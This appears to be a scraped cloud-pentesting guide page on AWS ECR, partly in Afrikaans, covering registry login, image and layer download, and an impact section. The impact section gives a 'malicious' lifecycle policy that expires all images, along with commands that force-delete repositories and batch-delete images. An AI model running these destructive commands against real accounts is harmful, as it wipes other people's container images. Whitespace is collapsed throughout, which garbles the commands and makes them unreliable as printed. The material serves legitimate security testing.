# Docker login into ecr## For public repo (always use us-east-1)awsecr-publicget-login-password--regionus-east-1|dockerlogin--usernameAWS--password-stdinpublic.ecr.aws/<random-id>## For private repoawsecrget-login-password--profile<profile_name>--region<region>|dockerlogin--usernameAWS--password-stdin<account_id>.dkr.ecr.<region>.amazonaws.com## If you need to acces an image from a repo if a different account, in <account_id> set the account number of the other account# Downloaddockerpull<account_id>.dkr.ecr.<region>.amazonaws.com/<repo_name>:latest## If you still have the error "Requested image not found"## It might be because the tag "latest" doesn't exit## Get valid tags with:TOKEN=$(aws--profile<profile>ecrget-authorization-token--outputtext--query'authorizationData[].authorizationToken')curl-i-H"Authorization: Basic $TOKEN"https://<account_id>.dkr.ecr.<region>.amazonaws.com/v2/<img_name>/tags/list# Inspect the imagedockerinspectsha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0# Upload (example uploading purplepanda with tag latest)dockertagpurplepanda:latest<account_id>.dkr.ecr.<region>.amazonaws.com/purplepanda:latestdockerpush<account_id>.dkr.ecr.<region>.amazonaws.com/purplepanda:latest# Downloading without Docker# List digestsawsecrbatch-get-image--repository-namelevel2 \--registry-id 653711331788 \--image-ids imageTag=latest|jq'.images[].imageManifest | fromjson'## Download a digestawsecrget-download-url-for-layer \--repository-name level2 \--registry-id 653711331788 \--layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a"
Na die aflaai van die beelde moet jy hulle vir sensitiewe inligting nagaan:
'n Aanvaller met enige van hierdie toestemmings kan 'n lewensiklusbeleid skep of wysig om alle beelde in die repository te verwyder en dan die hele ECR-repository te verwyder. Dit sal lei tot die verlies van alle houerbeelde wat in die repository gestoor is.
bashCopycode#CreateaJSONfilewiththemaliciouslifecyclepolicyecho'{"rules": [{"rulePriority": 1,"description": "Delete all images","selection": {"tagStatus": "any","countType": "imageCountMoreThan","countNumber": 0},"action": {"type": "expire"}}]}'>malicious_policy.json# Apply the malicious lifecycle policy to the ECR repositoryawsecrput-lifecycle-policy--repository-nameyour-ecr-repo-name--lifecycle-policy-textfile://malicious_policy.json# Delete the ECR repositoryawsecrdelete-repository--repository-nameyour-ecr-repo-name--force# Delete the ECR public repositoryawsecr-publicdelete-repository--repository-nameyour-ecr-repo-name--force# Delete multiple images from the ECR repositoryawsecrbatch-delete-image--repository-nameyour-ecr-repo-name--image-idsimageTag=latestimageTag=v1.0.0# Delete multiple images from the ECR public repositoryawsecr-publicbatch-delete-image--repository-nameyour-ecr-repo-name--image-idsimageTag=latestimageTag=v1.0.0